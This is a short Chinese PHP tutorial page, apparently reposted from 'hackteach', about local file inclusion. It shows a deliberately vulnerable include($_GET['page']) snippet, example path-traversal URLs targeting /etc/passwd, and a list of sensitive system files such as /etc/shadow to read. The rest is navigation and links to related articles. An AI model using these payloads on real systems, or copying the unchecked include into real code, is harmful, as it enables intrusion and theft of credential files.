编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

PHP的类功能齐全的发送邮件类

Oct 09 PHP

CodeIgniter基本配置详细介绍

Nov 12 PHP

php查看请求头信息获取远程图片大小的方法分享

Dec 25 PHP

Thinkphp中的volist标签用法简介

Jun 18 PHP

yii实现级联下拉菜单的方法

Jul 31 PHP

Yii中CGridView关联表搜索排序方法实例详解

Dec 03 PHP

jQuery Mobile + PHP实现文件上传

Dec 12 PHP

php约瑟夫问题解决关于处死犯人的算法

Mar 23 PHP

ThinkPHP V2.2说明文档没有说明的那些事实例小结

Jul 01 PHP

PHP mysql事务问题实例分析

Jan 18 PHP

PHP实现双链表删除与插入节点的方法示例

Nov 11 PHP

php并发加锁问题分析与设计代码实例讲解

Feb 26 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

J2EE面试题(19) Servlet面试题(20) UNIX面试题(27) Delphi面试题(13) SOA面试题(9) 自我评价(886) Ruby面试题(15) 自荐信(981) 自我鉴定(671) MySQL面试题(19)

You might like

php使用ftp远程上传文件类(完美解决主从文件同步问题的方法)

2016/09/23 PHP

PHP错误和异常处理功能模块示例

2016/11/12 PHP

Yii1.1中通过Sql查询进行的分页操作方法

2017/03/16 PHP

Yii框架参数化查询中IN查询只能查询一个的解决方法

2017/05/20 PHP

阿里云Win2016安装Apache和PHP环境图文教程

2018/03/11 PHP

Laravel框架控制器，视图及模型操作图文详解

2019/12/04 PHP

PHP+fiddler抓包采集微信文章阅读数点赞数的思路详解

2019/12/20 PHP

jquery select(列表)的操作（取值/赋值）

2009/08/06 Javascript

面向对象的Javascript之一(初识Javascript)

2012/01/20 Javascript

JQuery DataTable删除行后的页面更新利用Ajax解决

2013/05/17 Javascript

js读取注册表的键值示例

2013/09/25 Javascript

jquery阻止后续事件只执行第一个事件

2014/07/24 Javascript

js实现的捐赠管理完整实例

2015/01/20 Javascript

JavaScript中的DSL元编程介绍

2015/03/15 Javascript

jQuery获取标签文本内容和html内容的方法

2015/03/27 Javascript

JavaScript头像上传插件源码分享

2016/03/29 Javascript

Angular5中调用第三方库及jQuery的添加的方法

2018/06/07 jQuery

Vue不能检测到Object/Array更新的情况的解决

2018/06/26 Javascript

Javascript之高级数组API的使用实例

2019/03/08 Javascript

jQuery实现的点击显示隐藏下拉菜单功能完整示例

2019/05/17 jQuery

[49:15]DOTA2-DPC中国联赛正赛 CDEC vs XG BO3 第二场 1月19日

2021/03/11 DOTA

简单理解Python中的装饰器

2015/07/31 Python

Python的“二维”字典 (two-dimension dictionary)定义与实现方法

2016/04/27 Python

彻底理解Python list切片原理

2017/10/27 Python

Python实现备份MySQL数据库的方法示例

2018/01/11 Python

python下解压缩zip文件并删除文件的实例

2018/04/24 Python

对Tensorflow中的变量初始化函数详解

2018/07/27 Python

python 使用elasticsearch 实现翻页的三种方式

2020/07/31 Python

解决Ubuntu18中的pycharm不能调用tensorflow-gpu的问题

2020/09/17 Python

CSS3制作漂亮的照片墙的实现代码

2016/06/08 HTML / CSS

HTML5本地存储之Web Storage应用介绍

2013/01/06 HTML / CSS

西班牙伏林航空公司：Vueling

2016/08/05 全球购物

员工合理化建议书

2014/05/19 职场文书

研究生求职自荐书

2014/06/23 职场文书

音乐教师求职信范文

2015/03/20 职场文书

2015教师个人年度工作总结

2015/10/23 职场文书